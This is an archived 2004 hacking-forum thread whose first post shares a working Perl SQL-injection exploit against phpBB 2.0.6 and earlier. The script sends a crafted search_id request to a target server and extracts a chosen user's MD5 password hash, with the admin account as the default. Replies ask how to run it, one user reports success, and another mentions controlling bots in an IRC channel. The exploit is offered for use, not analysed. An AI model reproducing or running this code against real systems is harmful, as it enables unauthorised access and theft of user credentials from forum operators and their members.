ComSec
Jan 10 2004, 02:45 PM
MySQL v4.0 and all PHPBB Versions under 2.0.6
this tweak has been provided by icenix (Trial member)
any questions about it please direct them to icenix
thanks bud for sharing
| CODE | #!/usr/bin/perl -w
use IO::Socket;
## * work only with mysql ver > 4.0
##
## Example:
## [root@anarchist]# ./phpbb.pl 127.0.0.1 phpBB2 2 2
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] wo0t...MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##
if (@ARGV < 4)
{
print "\n\n";
print "|****************************************************************|\n";
print " r57phpbb.pl\n";
print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
print " by RusH and Tweaked by IceNix\n";
print " Enjoy =) ... \n";
print " Usage: phpbb.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: phpbb.pl 127.0.0.1 phpBB2 2 2\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print " [~] <search_id> - play with this value for results\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT reguest...
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat
(char& #40;97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,
108,
116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,
109,
97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,11
2,108,
105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50
,58,34)
,user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,
59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83
,67,34,
59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,5
8,54,
58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95
,99,
104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/*
HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>)
{
if ($answer =~ /;highlight=/)
{
$success = 1;
@result=split(/;/,$answer);
@result2=split(/=/,$result[1]);
$result2[1]=~s/&/ /g;
print "[+] wo0t...MD5 Hash for user with id=$user_id is: $result2[1]\n";
}
}
if ($success==0) {print "[-] exploit failed =( prolly not MySQL 4\n";} |
.
The Storm
Jan 14 2004, 12:52 PM
is thi exploit realy workin? and how good is it working? Has anyone tested it?
-=@cIdBuRn=-
Jan 14 2004, 02:10 PM
 which scanner using for it ???Banner scanner ??
XtrA
Jan 14 2004, 02:21 PM
how can i run perl exploit with winxp?
Steffan
Jan 14 2004, 09:58 PM
| QUOTE (XtrA @ Jan 14 2004, 02:21 PM) | | how can i run perl exploit with winxp? |
install cygwin and perl modul an run it  C'ya
icenix
Jan 15 2004, 01:42 AM
hey guys - im now a member  i guess most exploits run as smooth as syrup on Linux .. but you guys can use it for Windows if you install some sort Of Emulator like ActiveState Perl or something like that... It Does work.. but you just got to make sure their running MySQL 4.0 tested on RedHat 9 against PHPBB 2.0.5 if i can remember that right.. worked all okay... truly does work enjoi icenix
AsuKa
Jan 16 2004, 01:15 PM
Sounds interesting, could anyone provide a doc or tut on some uses for this tool, or least start me in the right direction. Thanks in advance
Yellow_Blue
Jan 17 2004, 06:47 AM
Sounds cool ;o
nice exploit
TrIaNguLaR
Jan 18 2004, 03:33 PM
thanks
jead99
Jan 18 2004, 05:25 PM
Thanks for sharing
SyN/AcK
Jan 18 2004, 06:21 PM
Works for me, thanks.
derquakecommander
Jan 18 2004, 06:58 PM
Yes i think is a nice exploit but i get everytime
[-] exploit failed =( prolly not MySQL 4
i hope i find a the right mySQL version
DvilleStoner
Feb 26 2004, 10:54 AM
| QUOTE (icenix @ Jan 15 2004, 01:42 AM) |
Hacking is like gay sex...you go through the backdoor and hope you dont run into a log
|
haha i have seen that in this irc channel i got bots in
=p
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
